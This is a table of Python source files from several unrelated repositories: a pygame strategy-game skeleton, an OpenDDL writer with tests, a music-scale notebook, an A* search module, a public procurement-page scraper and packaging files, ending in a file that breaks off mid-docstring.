| repo_name | path | text |
|---|---|---|
davincif/Amila-RTS
|
world_map/camp.py
|
from world_map.camp_types import CampType
from world_map.bioma_types import BiomaType
class Camp():
__type = None
__bioma = None
def __init__(self, bioma):
self.__bioma = bioma
|
davincif/Amila-RTS
|
main.py
|
#python imports
import random
#external libs imports
import pygame
#local imports
from world_map import wmap
#alias for easy access
world_map = wmap.world_map
#information about the screen pygame.display.Info()
screen_info = None
#the display 'pygame.display.set_mode'
game_display = None
#game clock
clock = None
#game loop status
gl_running = None
#the game name
game_name = '<NAME>'
#the game frames per second
game_fps = 30
#initialize the needed libraries and the game modules
def game_init():
global gl_running
global screen_info
global game_display
global clock
print('initializing...')
#initialize libraries
print('\tpygame...')
pygame.init()
#initialize global variables
gl_running = True
screen_info = pygame.display.Info()
game_display = pygame.display.set_mode((screen_info.current_w, screen_info.current_h))
pygame.display.set_caption(game_name)
clock = pygame.time.Clock()
random.seed()
#initialize modules
print('\tAmila modules...')
world_map.preprint = '\t\t'
world_map.init()
print('done\n')
#deinitialize the needed libraries and the game modules
def game_quit():
    print('quitting...')
    #quitting libraries
    print('\tpygame...')
    pygame.quit()
    #quitting modules
    print('\tAmila modules...')
    world_map.preprint = '\t\t'
    world_map.quit()
    #quitting python itself
print('done')
quit()
def main():
global screen_info
global game_display
global clock
global gl_running
global game_name
global game_fps
game_init()
world_map.generate_map()
# main loop
while gl_running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
                gl_running = False
pygame.display.update()
clock.tick(game_fps)
game_quit()
if __name__ == '__main__':
main()
|
davincif/Amila-RTS
|
world_map/camp_types.py
|
from enum import Enum
# from fuzy_prob.prob import Prob
class CampType():
CAMP = 1
CAVE = 2
DOUGEON = 3
LAKE = 4
SEA = 5
AQUIFER = 6
class CampProb():
# CAMP =
# CAVE =
# DOUGEON =
# LAKE =
# SEA =
# AQUIFER =
pass
|
davincif/Amila-RTS
|
fuzy_prob/prob.py
|
from enum import Enum
import random
maxnum = 1000
def flit_a_coin():
return random.randint(0, maxnum)
class Prob():
ALWAYS = 1000
EXTREMELY_COMMOM = 900
VERY_COMMOM = 700
COMMOM = 500
UNCOMMOM = 300
RARE = 150
VERY_RARE = 75
EXTREMELY_RARE = 40
NEVER = 0
def fuzify(self, value):
if(value == self.NEVER):
return self.NEVER
elif(value <= self.EXTREMELY_RARE):
return self.EXTREMELY_RARE
elif(value <= self.VERY_RARE):
return self.VERY_RARE
elif(value <= self.RARE):
return self.RARE
elif(value <= self.UNCOMMOM):
return self.UNCOMMOM
elif(value <= self.COMMOM):
return self.COMMOM
elif(value <= self.VERY_COMMOM):
return self.VERY_COMMOM
elif(value <= self.EXTREMELY_COMMOM):
return self.EXTREMELY_COMMOM
elif(value > self.EXTREMELY_COMMOM):
return self.ALWAYS
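
# Usage sketch (illustrative, not part of the original module): fuzify snaps a
# raw 0-1000 roll from flit_a_coin() onto the nearest named probability bucket.
if __name__ == "__main__":
    roll = flit_a_coin()          # e.g. 437
    bucket = Prob().fuzify(roll)  # 437 would fuzify to Prob.COMMOM (500)
    print(roll, "->", bucket)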
|
manosaladata/contrataciones-estado-emergencia
|
R/Archivos Temp/ws.py
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
DRIVER_PATH = 'C:/chromedriver.exe'
driver = webdriver.Chrome(executable_path=DRIVER_PATH)
driver.get("https://apps.osce.gob.pe/perfilprov-ui/ficha/20293847038")
#driver.get('https://google.com')
#options = Options()
#options.headless = True
#options.add_argument("--window-size=1920,1200")
#driver = webdriver.Chrome(options=options, executable_path=DRIVER_PATH)
#driver.get("https://apps.osce.gob.pe/perfilprov-ui/estadistica/20293847038#inhabMJ")
#print(driver.page_source)
#players = driver.find_elements_by_xpath('/"]')
driver.find_element_by_css_selector("span.score-legend").click()
text=driver.find_elements_by_css_selector(".data-container")
lista = []
for p in range(len(text)):
lista.append(text[p].text)
print(lista)
#driver.quit()
#print(a)
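
# Hedged note: the calls above use the Selenium 3 API (`executable_path`,
# `find_element_by_css_selector`), which Selenium 4 removed. Under Selenium 4
# the same scrape would look roughly like this sketch:
# from selenium.webdriver.chrome.service import Service
# from selenium.webdriver.common.by import By
# driver = webdriver.Chrome(service=Service(DRIVER_PATH))
# driver.get("https://apps.osce.gob.pe/perfilprov-ui/ficha/20293847038")
# driver.find_element(By.CSS_SELECTOR, "span.score-legend").click()
# lista = [el.text for el in driver.find_elements(By.CSS_SELECTOR, ".data-container")]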
|
Squareys/PyDDL
|
src/pyddl.py
|
from abc import abstractmethod
import math
from enum import Enum
__author__ = "<NAME>"
__version__ = "0.1.0"
class DdlPrimitiveDataType(Enum):
"""
Enum for primitive structure data types.
    For convenience use `from pyddl import DdlPrimitiveDataType as DataType`,
    for example.
"""
bool = 0
int8 = 1
int16 = 2
int32 = 3
int64 = 4
unsigned_int8 = 5
unsigned_int16 = 6
unsigned_int32 = 7
unsigned_int64 = 8
half = 9
float = 10
double = 11
string = 12
ref = 13
type = 14
class DdlPrimitive:
"""
An OpenDDL primitive structure.
"""
def __init__(self, data_type, data, name=None, vector_size=0):
"""
Constructor
:param data_type: primitive data type (see pyddl.enum.PrimitiveType)
:param data: list of values. If vector_size != 0, the list should contain tuples
:param name: name of the primitive structure
:param vector_size: size of the contained vectors
"""
self.data_type = data_type
self.name = name
self.vector_size = vector_size
self.data = data
def is_simple_primitive(self):
if len(self.data) == 1:
return self.vector_size <= 4
elif len(self.data) <= 4:
return self.vector_size == 0
return False
class DdlStructure:
"""
An OpenDDL structure.
"""
    def __init__(self, identifier, name=None, children=None, props=None):
        """
        Constructor
        :param identifier: structure identifier
        :param name: optional name
        :param children: list of substructures
        :param props: dict of properties
        """
        # copy the arguments to avoid Python's shared-mutable-default pitfall
        self.children = list(children) if children is not None else []
        self.properties = dict(props) if props is not None else {}
        self.identifier = identifier
        self.name = name if name != "" else None
        self.name_is_global = True
    def is_simple_structure(self):
        """
        A structure is simple if it contains exactly one primitive, has at most one property and no name.
        :return: true if this structure is simple
        """
if len(self.children) != 1:
# a simple structure may contain only one primitive substructure
return False
if len(self.properties) > 1:
# a simple structure does not have more than one property
return False
if self.name is not None:
# simple children don't have a name
return False
if not isinstance(self.children[0], DdlPrimitive):
# the only substructure needs to be a primitive
return False
return self.children[0].is_simple_primitive()
def add_structure(self, identifier, name=None, children=[], props=dict()):
"""
Add a substructure
:param identifier: structure identifier
:param name: optional name
:param children: list of substructures or primitives
:param props: dict of properties
:return: the created structure
"""
s = DdlStructure(identifier, name, children, props)
self.children.append(s)
return s
def add_primitive(self, data_type, data=[], name=None, vector_size=0):
"""
Add a primitive substructure
:param data_type: primitive data type (see pyddl.enum.PrimitiveType)
:param data: list of values. If vector_size != 0, the list should contain tuples
:param name: name of the primitive structure
:param vector_size: size of the contained vectors
:return: self (for method chaining)
"""
self.children.append(DdlPrimitive(data_type, data, name, vector_size))
return self
class DdlDocument:
"""
An OpenDDL document.
"""
def __init__(self):
self.structures = []
def add_structure(self, identifier, name=None, children=[], props=dict()):
"""
Add a substructure
:param identifier: structure identifier
:param name: optional name
:param children: list of substructures and primitives
:param props: dict of properties
:return: the created structure
"""
s = DdlStructure(identifier, name, children, props)
self.structures.append(s)
return s
class DdlWriter:
"""
Abstract class for classes responsible for writing OpenDdlDocuments.
"""
def __init__(self, document):
"""
Constructor
:param document: document to write
"""
self.doc = document
def get_document(self):
"""
:return: document to be written by this writer.
"""
return self.doc
@abstractmethod
def write(self, filename):
"""
Write the writers document to a specified file.
:param filename: path to a file to write to
:return: nothing
"""
pass
class DdlTextWriter(DdlWriter):
"""
OpenDdlWriter which writes OpenDdlDocuments in human-readable text form.
"""
def __init__(self, document, rounding=6):
"""
Constructor
:param document: document to write
:param rounding: number of decimal places to keep or None to keep all
"""
DdlWriter.__init__(self, document)
self.file = None
self.indent = B""
self.rounding = rounding
def to_float_byte_rounded(self, f):
if (math.isinf(f)) or (math.isnan(f)):
return B"0.0"
else:
return bytes(str(round(f, self.rounding)), "UTF-8")
@staticmethod
def to_float_byte(f):
if (math.isinf(f)) or (math.isnan(f)):
return B"0.0"
else:
return bytes(str(f), "UTF-8")
@staticmethod
def to_int_byte(i):
return bytes(str(i), "UTF-8")
@staticmethod
def to_string_byte(s):
return B"\"" + bytes(s, "UTF-8") + B"\""
@staticmethod
def to_bool_byte(b):
return B"true" if b else B"false"
@staticmethod
def to_ref_byte(structure):
if structure is None:
return B"null"
return (B"$" if structure.name_is_global else B"%") + structure.name
@staticmethod
def id(val):
return val
def inc_indent(self):
"""
Increase the current line indent.
"""
self.indent = self.indent + B"\t"
def dec_indent(self):
"""
Decrease the current line indent.
"""
self.indent = self.indent[:-1]
def write(self, filename):
self.file = open(filename, "wb")
if len(self.get_document().structures) != 0:
            # the first element never gets an empty line prepended
structure = self.get_document().structures[0]
self.file.write(self.structure_as_text(structure))
previous_was_simple = structure.is_simple_structure()
for structure in self.get_document().structures[1:]:
if not (previous_was_simple and structure.is_simple_structure()):
self.file.write(B"\n")
previous_was_simple = structure.is_simple_structure()
self.file.write(self.structure_as_text(structure))
self.file.close()
def property_as_text(self, prop):
"""
        Create a text representation for a key-value pair, e.g.: "key = value".
:param prop: a pair to represent as text
:return: a byte-string in the form "key = value"
"""
value = prop[1]
if isinstance(value, bool):
value_bytes = self.to_bool_byte(value)
elif isinstance(value, int):
value_bytes = self.to_int_byte(value)
elif isinstance(value, float):
value_bytes = self.to_float_byte(value)
elif isinstance(value, DdlStructure):
value_bytes = self.to_ref_byte(value)
elif isinstance(value, str):
value_bytes = B"\"" + bytes(value, "UTF-8") + B"\""
elif isinstance(value, bytes):
value_bytes = B"\"" + value + B"\""
else:
raise TypeError("ERROR: Unknown property type for property \"{}\"".format(prop[0]))
return prop[0] + B" = " + value_bytes
def primitive_as_text(self, primitive, no_indent=False):
"""
Get a text representation of the given primitive structure
:param primitive: primitive structure to get the text representation for
:param no_indent: if true will skip adding the first indent
:return: a byte string representing the primitive structure
"""
lines = [(B"" if no_indent else self.indent) + bytes(primitive.data_type.name, "UTF-8")]
if primitive.vector_size > 0:
lines.append(B"[" + self.to_int_byte(primitive.vector_size) + B"]")
if primitive.name is not None:
lines.append(B" $" + primitive.name + B" ")
has_comment = hasattr(primitive, 'comment')
if has_comment:
lines.append(B"\t\t// " + primitive.comment)
# find appropriate conversion function
if primitive.data_type in [DdlPrimitiveDataType.bool]:
# bool
to_bytes = self.to_bool_byte
elif primitive.data_type in [DdlPrimitiveDataType.double, DdlPrimitiveDataType.float]:
# float/double
to_bytes = self.to_float_byte if self.rounding is None else self.to_float_byte_rounded
elif primitive.data_type in [DdlPrimitiveDataType.int8, DdlPrimitiveDataType.int16, DdlPrimitiveDataType.int32,
DdlPrimitiveDataType.int64, DdlPrimitiveDataType.unsigned_int8,
DdlPrimitiveDataType.unsigned_int16, DdlPrimitiveDataType.unsigned_int32,
DdlPrimitiveDataType.unsigned_int64, DdlPrimitiveDataType.half]:
# integer types
to_bytes = self.to_int_byte
elif primitive.data_type in [DdlPrimitiveDataType.string]:
# string
if primitive.vector_size == 0 and len(primitive.data) > 0:
to_bytes = self.id if isinstance(primitive.data[0], bytes) else self.to_string_byte
else:
if len(primitive.data) > 0:
to_bytes = self.id if isinstance(primitive.data[0][0], bytes) else self.to_string_byte
elif primitive.data_type in [DdlPrimitiveDataType.ref]:
to_bytes = self.to_ref_byte
else:
raise TypeError("Encountered unknown primitive type.")
if len(primitive.data) == 0:
lines.append(B"\n" if has_comment else B" ")
lines.append(B"{ }")
elif primitive.is_simple_primitive():
lines.append(B"\n" if has_comment else B" ")
if primitive.vector_size == 0:
lines.append(B"{" + B", ".join(map(to_bytes, primitive.data)) + B"}")
else:
lines.append(B"{{" + (B", ".join(map(to_bytes, primitive.data[0]))) + B"}}")
else:
lines.append(B"\n" + self.indent + B"{\n")
self.inc_indent()
if primitive.vector_size == 0:
if hasattr(primitive, 'max_elements_per_line'):
n = primitive.max_elements_per_line
data = primitive.data
lines.append(self.indent + ((B",\n" + self.indent).join(
[B", ".join(group) for group in
[map(to_bytes, data[i:i + n]) for i in range(0, len(data), n)]])) + B"\n")
else:
lines.append(self.indent + (B", ".join(map(to_bytes, primitive.data))) + B"\n")
else:
if hasattr(primitive, 'max_elements_per_line'):
n = primitive.max_elements_per_line
data = primitive.data
if len(data) == 1:
data = data[0]
# there is exactly one vector, we will handle its components for formatting with
# max_elements_per_line.
lines.append(self.indent + B"{" + ((B",\n" + self.indent + B" ").join(
[(B", ".join(map(to_bytes, line))) for line in
[data[i:i + n] for i in range(0, len(data), n)] # group generator
]) + B"}\n"))
else:
lines.append(self.indent + B"{" + ((B"},\n" + self.indent + B"{").join(
[(B"}, {".join(B", ".join(map(to_bytes, vec)) for vec in group)) for group in
[data[i:i + n] for i in range(0, len(data), n)]])) + B"}\n")
else:
lines.append(self.indent + B"{" + (B"}, {".join(
B", ".join(map(to_bytes, vec)) for vec in primitive.data)) + B"}\n")
self.dec_indent()
lines.append(self.indent + B"}")
return lines
def structure_as_text(self, structure):
"""
Get a text representation of the given structure
:param structure: structure to get the text representation for
:return: a byte string representing the structure
"""
lines = [self.indent + structure.identifier]
if structure.name:
lines.append(B" $" if structure.name_is_global else B" %")
lines.append(structure.name)
if len(structure.properties) != 0:
lines.append(B" (" + B", ".join(self.property_as_text(prop) for prop in structure.properties.items()) + B")")
has_comment = hasattr(structure, 'comment')
if has_comment:
lines.append(B"\t\t// " + structure.comment)
if structure.is_simple_structure() and not has_comment:
lines.append(B" {")
lines.extend(self.primitive_as_text(structure.children[0], True))
lines.append(B"}\n")
else:
lines.append(B"\n" + self.indent + B"{\n")
previous_was_simple = False
first = structure.children[0]
self.inc_indent()
for sub in structure.children:
if isinstance(sub, DdlPrimitive):
lines.extend(self.primitive_as_text(sub))
lines.append(B"\n")
previous_was_simple = False
else:
if not (previous_was_simple and sub.is_simple_structure()) and not sub == first:
lines.append(B"\n")
lines.append(self.structure_as_text(sub))
previous_was_simple = sub.is_simple_structure()
self.dec_indent()
lines.append(self.indent + B"}\n")
return B''.join(lines)
@staticmethod
def set_max_elements_per_line(primitive, elements):
"""
Set how many elements should be displayed per line for a primitive structure.
When there is more than one element, every vector is handled as one element.
If there is merely one element in the primitive data and this element is a vector,
the components of the vector are treated as the elements.
:param primitive: the primitive
:param elements: max amount of elements per line
:return: the provided primitive with an added `max_elements_per_line` attribute
"""
if isinstance(primitive, DdlPrimitive):
primitive.max_elements_per_line = elements
return primitive
else:
raise TypeError("max_elements_per_line can only be set for DdlPrimitive")
@staticmethod
def set_comment(structure, comment):
"""
Set a one-line comment to a structure or primitive structure
:param structure: the structure to add the one-line comment to
:param comment: the comment to add
:return: the provided structure with an added `comment` attribute
"""
if isinstance(structure, DdlStructure) or isinstance(structure, DdlPrimitive):
if isinstance(comment, bytes):
structure.comment = comment
else:
structure.comment = bytes(str(comment), "UTF-8")
return structure
else:
raise TypeError("set_comment can only be set for DdlPrimitive or DdlStructure")
class DdlCompressedTextWriter(DdlTextWriter):
"""
OpenDdlWriter which writes OpenDdlDocuments in compressed (probably not human-readable) text form.
Making use of "Whitespace never has any meaning, so OpenDDL files can be formatted in any manner preferred.", see
OpenDDL specification.
Faster than DdlTextWriter and produces smaller files.
"""
def __init__(self, document, rounding=6):
"""
Constructor
:param document: document to write
:param rounding: number of decimal places to keep or None to keep all
"""
super().__init__(document, rounding)
def write(self, filename):
self.file = open(filename, "wb")
if len(self.get_document().structures) != 0:
for structure in self.get_document().structures:
self.file.write(self.structure_as_text(structure))
self.file.close()
def property_as_text(self, prop):
"""
        Create a text representation for a key-value pair, e.g.: "key=value".
:param prop: a pair to represent as text
:return: a byte-string in the form "key=value"
"""
value = prop[1]
if isinstance(value, bool):
value_bytes = self.to_bool_byte(value)
elif isinstance(value, int):
value_bytes = self.to_int_byte(value)
elif isinstance(value, float):
value_bytes = self.to_float_byte(value)
elif isinstance(value, str):
value_bytes = B"\"" + bytes(value, "UTF-8") + B"\""
elif isinstance(value, bytes):
value_bytes = B"\"" + value + B"\""
else:
raise TypeError("ERROR: Unknown property type for property \"{}\"".format(prop[0]))
return prop[0] + B"=" + value_bytes
def primitive_as_text(self, primitive):
"""
Get a text representation of the given primitive structure
:param primitive: primitive structure to get the text representation for
:return: a byte string representing the primitive structure
"""
lines = [bytes(primitive.data_type.name, "UTF-8")]
if primitive.vector_size > 0:
lines.append(B"[" + self.to_int_byte(primitive.vector_size) + B"]")
if primitive.name is not None:
lines.append(B"$"+ primitive.name)
# find appropriate conversion function
if primitive.data_type in [DdlPrimitiveDataType.bool]:
# bool
to_bytes = self.to_bool_byte
elif primitive.data_type in [DdlPrimitiveDataType.double, DdlPrimitiveDataType.float]:
# float/double
to_bytes = self.to_float_byte if self.rounding is None else self.to_float_byte_rounded
elif primitive.data_type in [DdlPrimitiveDataType.int8, DdlPrimitiveDataType.int16, DdlPrimitiveDataType.int32,
DdlPrimitiveDataType.int64, DdlPrimitiveDataType.unsigned_int8,
DdlPrimitiveDataType.unsigned_int16, DdlPrimitiveDataType.unsigned_int32,
DdlPrimitiveDataType.unsigned_int64, DdlPrimitiveDataType.half]:
# integer types
to_bytes = self.to_int_byte
elif primitive.data_type in [DdlPrimitiveDataType.string]:
# string
if primitive.vector_size == 0 and len(primitive.data) > 0:
to_bytes = self.id if isinstance(primitive.data[0], bytes) else self.to_string_byte
else:
if len(primitive.data) > 0:
to_bytes = self.id if isinstance(primitive.data[0][0], bytes) else self.to_string_byte
elif primitive.data_type in [DdlPrimitiveDataType.ref]:
to_bytes = self.to_ref_byte
else:
raise TypeError("Encountered unknown primitive type.")
if len(primitive.data) == 0:
lines.append(B"{}")
elif primitive.is_simple_primitive():
if primitive.vector_size == 0:
lines.append(B"{" + to_bytes(primitive.data[0]) + B"}")
else:
lines.append(B"{{" + (B",".join(map(to_bytes, primitive.data[0]))) + B"}}")
else:
if primitive.vector_size == 0:
lines.append(B"{" + B",".join(map(to_bytes, primitive.data)) + B"}")
else:
lines.append(B"{{" + (B"},{".join(B",".join(map(to_bytes, vec)) for vec in primitive.data)) + B"}}")
return lines
def structure_as_text(self, structure):
"""
Get a text representation of the given structure
:param structure: structure to get the text representation for
:return: a byte string representing the structure
"""
lines = [structure.identifier]
if structure.name:
lines.append(B"$" if structure.name_is_global else B"%")
lines.append(structure.name)
if len(structure.properties) != 0:
lines.append(B"(" + B",".join(self.property_as_text(prop) for prop in structure.properties.items()) + B")")
lines.append(B"{")
for sub in structure.children:
if isinstance(sub, DdlPrimitive):
lines.extend(self.primitive_as_text(sub))
else:
lines.append(self.structure_as_text(sub))
lines.append(B"}")
return B''.join(lines)
# Space reserved for a specification based OpenDdlBinaryWriter ;)
# Hope there will be some specification for it some day.
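
# Usage sketch (illustrative, not part of the module): build a tiny document
# and serialize it with both writers. Identifiers, names and string data are
# passed as byte strings, since the writers concatenate bytes throughout.
if __name__ == "__main__":
    doc = DdlDocument()
    metric = doc.add_structure(B"Metric", props={B"key": B"distance"})
    metric.add_primitive(DdlPrimitiveDataType.float, [1.0])
    DdlTextWriter(doc).write("example.ddl")                       # pretty text
    DdlCompressedTextWriter(doc).write("example_compressed.ddl")  # minified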
|
Squareys/PyDDL
|
tests/DdlTextWrterTest.py
|
import os
import unittest
from collections import OrderedDict
from pyddl import DdlPrimitiveDataType as DataType
from pyddl import *
__author__ = "<NAME>"
class DdlTextWriterTest(unittest.TestCase):
def readContents(self, filename):
"""
Open, read the contents and then close a file.
:param filename: name of the file to read the contents of
:return: Contents of the file with given filename
"""
file = open(filename)
contents = file.read()
file.close()
return contents
def assertFilesEqual(self, test_filename, expected_filename):
"""
Check whether the contents of two files are equal
:param test_filename: name of the file to test
:param expected_filename: name of the file containing expected content
"""
self.assertEqual(self.readContents(test_filename), self.readContents(expected_filename))
def tearDown(self):
try:
os.remove("test.ddl")
os.remove("test_compressed.ddl")
except FileNotFoundError:
pass # test_empty failed?
def test_empty(self):
# create document
document = DdlDocument()
# write document
DdlTextWriter(document).write("test.ddl")
# check if file was created
try:
self.assertTrue(os.path.isfile("test.ddl"))
except FileNotFoundError:
self.fail("DdlTextWriter did not create the specified file.")
def test_empty_compressed(self):
# create document
document = DdlDocument()
# write document
DdlCompressedTextWriter(document).write("test_compressed.ddl")
# check if file was created
try:
self.assertTrue(os.path.isfile("test_compressed.ddl"))
except FileNotFoundError:
self.fail("DdlCompressedTextWriter did not create the specified file.")
@staticmethod
def create_document():
document = DdlDocument()
human_struct = document.add_structure(
B"Human", B"human1",
[DdlStructure(B"Name", children=[DdlPrimitive(DataType.string, ["Peter"])]),
DdlStructure(B"Age",
children=[DdlPrimitive(DataType.unsigned_int16, [21])])],
props=OrderedDict([(B"Weird", True), (B"Funny", 12)]))
DdlTextWriter.set_comment(human_struct, B"not an alien")
human_struct.add_structure(B"Self", children=[DdlPrimitive(DataType.ref, [human_struct])])
# a primitive array
prim = DdlTextWriter.set_comment(DdlPrimitive(DataType.int32, range(1, 100)), B"100")
DdlTextWriter.set_max_elements_per_line(prim, 10)
        # an array of vectors of primitives
vects = DdlPrimitive(DataType.int32, [(x, x * 2) for x in range(1, 100)], None, 2)
DdlTextWriter.set_max_elements_per_line(vects, 5)
# add the above primitives to the document, wrapped by another structure
document.add_structure(B"SomethingElse", children=[DdlStructure(B"AnArray", children=[prim])])
document.add_structure(B"MoreElse", children=[DdlStructure(B"AnVectorArray", children=[vects])])
return document
def test_full(self):
# create document
document = self.create_document()
# write document
DdlTextWriter(document).write("test.ddl")
self.assertFilesEqual("test.ddl", "expected.ddl")
def test_full_compressed(self):
# create document
document = self.create_document()
# write document
DdlCompressedTextWriter(document).write("test_compressed.ddl")
self.assertFilesEqual("test_compressed.ddl", "expected_compressed.ddl")
if __name__ == "__main__":
unittest.main()
|
grveek/Music
|
musicGV20201015-Copy1.py
|
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import numpy as np
import pandas as pd
# In[3]:
half_steps_sharps = ["A","A#","B","C","C#","D","D#","E","F","F#","G","G#"]
half_steps_flats = ["A","Bb","B","C","Db","D","Eb","E","F","Gb","G","Ab"]
half_steps = np.arange(0,12,1)
# In[4]:
key_major_half_steps = np.array([0,2,4,5,7,9,11])
key_minor_half_steps = np.array([0,2,3,5,7,8,10])
key_dorian_half_steps = np.array([0,2,3,5,7,9,10])
key_phrygian_half_steps = np.array([0,1,3,5,7,8,10])
key_lydian_half_steps = np.array([0,2,4,6,7,9,11])
key_mixolydian_half_steps = np.array([0,2,4,5,7,9,10])
key_locrian_half_steps = np.array([0,1,3,5,6,8,10])
key_byzantine_half_steps = np.array([0,1,4,5,6,8,10])
key_enigmatic_half_steps = np.array([0,2,3,5,7,9,10])
key_neopolitan_maj_half_steps = np.array([0,1,3,5,7,9,11])
key_neopolitan_min_half_steps = np.array([0,1,3,5,7,8,11])
key_hungarian_maj_half_steps = np.array([0,3,4,6,7,9,10])
key_hungarian_min_half_steps = np.array([0,2,3,6,7,8,11])
key_mixolydianb6_half_steps = np.array([0,2,4,5,7,8,10])
key_harmonic_min_half_steps = np.array([0,2,3,5,7,8,11])
key_lydian_dom_half_steps = np.array([0,2,4,6,7,9,10])
key_diminished_half_steps = np.array([0,2,3,5,6,8,9])
key_half_diminished_half_steps = np.array([0,1,3,4,6,7,9])
key_dorian_sharp4_half_steps = np.array([0,2,3,6,7,9,10])
notes = ["A", "B", "C", "D", "E", "F", "G"]
chord_symbols = ["m", "dim", "+", "add9", "sus2", "sus4", "sus2/4", "b5", "m7b5", "7", "Maj7", "m7" ]
sharp_flat = ["#", "b"]
position = ["I", "II", "III", "IV", "V", "VI", "VII"]
scales_modes = ["Major", "Minor", "Dorian", "Phrygian", "Lydian", "Mixolydian", "Locrian", "Byzantine", "Enigmatic","Neopolitan Major","Neopolitan Minor","Hungarian Major","Hungarian Minor","Mixolydian b6","Harmonic Minor","Lydian Dominant","Diminished","Half-Diminished", "Dorian Sharp 4"]
compiled_scales = [key_major_half_steps,key_minor_half_steps,key_dorian_half_steps,key_phrygian_half_steps,key_lydian_half_steps,key_mixolydian_half_steps,key_locrian_half_steps,key_byzantine_half_steps,key_enigmatic_half_steps,key_neopolitan_maj_half_steps,key_neopolitan_min_half_steps,key_hungarian_maj_half_steps,key_hungarian_min_half_steps,key_mixolydianb6_half_steps,key_harmonic_min_half_steps,key_lydian_dom_half_steps,key_diminished_half_steps,key_half_diminished_half_steps,key_dorian_sharp4_half_steps]
# In[5]:
scales_modes_hs_df_chart = pd.DataFrame()
# pair each mode name with its half-step pattern, column by column
for name, steps in zip(scales_modes, compiled_scales):
    scales_modes_hs_df_chart[name] = steps
scales_modes_hs_df_chart
# In[6]:
df = scales_modes_hs_df_chart
df.iloc[2:5,4:8]
# In[ ]:
# In[ ]:
# In[ ]:
# In[73]:
# hs notes dictionary
hs_notes = dict((keys,values) for keys,values in zip(half_steps,half_steps_sharps))
z = hs_notes
# In[66]:
#test to see if one can create a key list of notes
key = []
for i in key_major_half_steps:
for x in z.keys():
if x == i:
key.append(z[i])
print("A major key:", key)
# In[71]:
#test #2 to see if one can create a key list of notes
key = []
for i in key_minor_half_steps:
for x in z.keys():
if x == i:
key.append(z[i])
print("A minor key:", key)
# In[70]:
#test #3 to see if one can create a key list of notes
key = []
for i in key_dorian_half_steps:
for x in z.keys():
if x == i:
key.append(z[i])
print("A minor Dorian key:", key)
# In[69]:
key = []
zq = [x for i in key_minor_half_steps for x in z.keys() if x == i]
zq
# the list comprehension grabs the matching keys, but the values still need to be printed (right now it does not work)
# In[1]:
# define a function to obtain the notes of a requested key/mode/scale
def get_scale():
    scale_req = input("Input required key >>> ")
    # code in user-selected HS list
    # consider using dataframe object above?
    # temp is hard-wired to test the function - the user will select
    temp = key_major_half_steps
    hs_notes = dict((keys,values) for keys,values in zip(half_steps,half_steps_sharps))
    temp_z = hs_notes
    temp_z1 = temp + (half_steps_sharps.index(scale_req) - half_steps_sharps.index("A"))
    # wrap shifted values back into the 0-11 range (>= 12, so 12 maps to 0)
    for i in range(len(temp_z1)):
        if temp_z1[i] >= 12:
            temp_z1[i] = temp_z1[i] - 12
    key = []
    for i in temp_z1:
        for x in temp_z.keys():
            if x == i:
                key.append(temp_z[i])  # append the note name for this half step
    del temp
    del hs_notes
    del temp_z
    del temp_z1
    print("The", scale_req, "scale is:", key)
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
|
rystrauss/cannibals
|
cannibals/search/informed_search.py
|
"""Implementations of informed search strategies.
Author: <NAME>
"""
from cannibals.problems import AbstractProblem
from cannibals.search.base import SearchStrategy, Node
from cannibals.search.frontiers import PriorityFrontier
class AStarSearch(SearchStrategy):
"""Implementation of A* search.
A* is the most widely known form of best-first search. It evaluates nodes by combining g(n), the cost to reach the
node, and h(n), the estimated cost to get from the node to the goal. Thus, if we are trying to find the cheapest
    solution, a reasonable thing to try first is the node with the lowest value of g(n) + h(n).
"""
@staticmethod
def search(problem, heuristic_fn=None):
"""Attempts to solve the given problem by performing a search over the state space.
Args:
problem: The `AbstractProblem` instance that is to be solved.
heuristic_fn: A function that accepts a state of `problem` as the single argument and returns an estimate
of the cost to reach the goal from that state. If None, no heuristic is used and this becomes uniform
cost search.
Returns:
A 2-tuple with:
solution: A list of actions that represents the solution to the problem.
nodes_generated: The number of nodes that were generated during the search process.
"""
        assert isinstance(problem, AbstractProblem)
        node = Node(problem.initial_state, 0)
        generated_nodes = 1
        if problem.goal_test(node.state):
            return node.solution, generated_nodes
        frontier = PriorityFrontier([node])
        explored = set()
        solution = None
        while not frontier.empty():
            node = frontier.pop()
            if problem.goal_test(node.state):
                solution = node.solution
                break
            explored.add(node)
            # expand once, passing the heuristic, and count the generated children
            children = node.expand(problem, heuristic_fn=heuristic_fn)
            generated_nodes += len(children)
            for child in children:
                if not (child in explored or child in frontier):
                    frontier.push(child)
                elif child in frontier:
                    frontier.maybe_update(child)
        return solution, generated_nodes
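
# Worked illustration (not part of the module): the PriorityFrontier orders
# nodes by f(n) = g(n) + h(n), i.e. Node.path_cost + Node.estimated_cost, so a
# node reached for cost 4 with heuristic estimate 3 (f = 7) is popped before
# one reached for cost 6 with estimate 2 (f = 8):
# >>> Node("a", 4, estimated_cost=3.0) < Node("b", 6, estimated_cost=2.0)
# True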
|
rystrauss/cannibals
|
cannibals/problems/__init__.py
|
from .base import AbstractProblem
|
rystrauss/cannibals
|
setup.py
|
import setuptools
with open('README.md', 'r') as fp:
long_description = fp.read()
setuptools.setup(
name='cannibals',
version='0.1',
packages=setuptools.find_packages(),
url='https://github.com/rystrauss/cannibals',
license='LICENSE',
author='<NAME>',
author_email='<EMAIL>',
description='Search strategies for problem-solving agents.',
long_description=long_description,
long_description_content_type='text/markdown',
python_requires='>=3.6'
)
|
rystrauss/cannibals
|
cannibals/problems/base.py
|
"""Provides the base abstract problem class, which represents a search problem.
Author: <NAME>
"""
from abc import ABC, abstractmethod
class AbstractProblem(ABC):
"""An abstract problem, from which all problem classes should inherit.
A problem in this case is referring to a search problem that can be solved by a goal-based problem-solving
agent. The problem's states are represented atomically -- that is, as a whole with no internal structure visible
to the agent.
A problem consists of an *initial state*, a description of *actions*, a *transition model*, a *goal test*, and a
*path cost function*.
States can take any form for a particular problem, so long as their `__hash__` and `__eq__` methods are
implemented to reflect that logically equivalent states are determined to be equal and are mapped to the same
location in a hash table.
"""
def __init__(self, initial_state):
"""Constructs a new `AbstractProblem`.
Args:
initial_state: The problem's initial state.
"""
self._initial_state = initial_state
@property
def initial_state(self):
"""The initial state of the problem."""
return self._initial_state
@abstractmethod
def get_actions(self, state):
"""Given a particular state, this method returns the set of possible actions that can be executed in that state.
Args:
